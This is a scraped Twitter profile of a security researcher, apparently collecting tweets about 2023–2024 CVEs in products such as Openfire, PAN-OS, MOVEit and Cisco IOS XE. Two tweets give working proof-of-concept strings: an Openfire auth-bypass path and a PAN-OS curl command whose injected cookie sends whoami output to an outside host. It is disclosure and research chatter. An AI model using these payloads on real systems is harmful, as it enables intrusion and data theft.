M4rtin Hsu (@_0xf4n9x_)'s Twitter Profile
M4rtin Hsu

@_0xf4n9x_

CyberSec Enthusiast, Security Researcher, RedTeam, Security Automation, ❣️OpenSource

ID: 1144443853375590400

https://github.com/0xf4n9x

28-06-2019 03:14:12

253 Tweet

4,4K Followers

93 Following

Horizon3 Attack Team (@horizon3attack)

CVE-2023-27524, a dangerous default configuration in #Apache #Superset, allows an unauth attacker to:
🔺 Gain RCE
🔺 Harvest Creds
🔺 Compromise Data 

We estimate there are roughly 2K+ servers on the Internet affected by this issue.

horizon3.ai/cve-2023-27524…
Harsh Jaiswal (@rootxharsh)

CVE-2023-20864 - VMware Aria Operations for Logs / Log Insight Pre-Authentication RCE PoC.

nuclei Template - github.com/projectdiscove…

cc Rahul Maini wvu !
Germán Fernández (@1zrr4h)

🚨 1/ Ongoing campaign primarily targeting security researchers here on Twitter.

Possibly they are trying to exploit some vulnerability in Internet Explorer and database tools like Navicat. I haven't been able to get the malicious payload yet, but something fishy is going on 🤔
Caitlin Condon (@catc0n)

Rapid7 has released a full exploit chain for #MOVEit Transfer CVE-2023-34362. The write-up we've published in AttackerKB contains more than 30 pages of analysis and code — huge shout-out to Ron Bowes, Stephen Fewer, and Curt Fielding for their work on this. attackerkb.com/topics/mXmV0Yp…

SinSinology (@sinsinology)

🚨 Here is the #Exploit and technical detail for the CVE-2023-20887 Pre-Authenticated Remote Code Execution in #VMWare vRealize Network Insight.
summoning.team/blog/vmware-vr…
M4rtin Hsu (@_0xf4n9x_)

#CVE-2023-32315 Openfire Admin Console Auth Bypass

#POC: 
/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

Ref: github.com/advisories/GHS…

Credit to Siebene@
watchTowr (@watchtowrcyber)

we're back - causing trouble with more enterprise-grade firewalls :-) join us on the journey...

labs.watchtowr.com/yet-more-unaut…
Praetorian (@praetorianlabs)

F5 BIGIP is vulnerable to a smuggling request vulnerability that an attacker can exploit to achieve unauthorized RCE. Our vulnerability research team responsibly disclosed this to F5, which released a hotfix today. hubs.ly/Q026ThPw0 #vulnerabilityresearch #f5 #cve

Horizon3 Attack Team (@horizon3attack)

🔍 New POC Available! We’ve developed a Proof of Concept for CVE-2023-20198 in #Cisco IOS XE. This authentication-bypass allows an attacker to create new users with privilege level 15. Check out the details in horizon3.ai/cisco-ios-xe-c…
M4rtin Hsu (@_0xf4n9x_)

#CVE-2023-51467 Apache OFBiz auth bypass Groovy #RCE Vulnerability

The vuln stems from an incomplete patch fix for the CVE-2023-49070, and a post-auth Groovy RCE.
Kali Linux (@kalilinux)

The xz package, starting from version 5.6.0 to 5.6.1, was found to contain a backdoor. The impact of this vulnerability affected Kali between March 26th to March 29th. If you updated your Kali installation on or after March 26th, it is crucial to apply the latest updates today.

M4rtin Hsu (@_0xf4n9x_)

#CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Path Traversal -> File Write -> OS Command Injection POC: curl https://host/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/a`curl${IFS}uip/?u=$(whoami)`'

M4rtin Hsu (@_0xf4n9x_)

An SSTI vulnerability in CrushFTP allows an unauthenticated attacker to read files from the file system outside of the VFS sandbox, bypass authentication to gain administrative access, and perform RCE on the server. attackerkb.com/topics/20oYjlm…

GitHub Security Lab (@ghsecuritylab)

🚀 CodeQL zero to hero part 3: Security research with CodeQL! Learn how to audit applications for vulnerabilities with CodeQL, tricks we can use for security research workflow, and how to find bugs in thousands of GitHub repos at once using MRVA.

github.blog/2024-04-29-cod…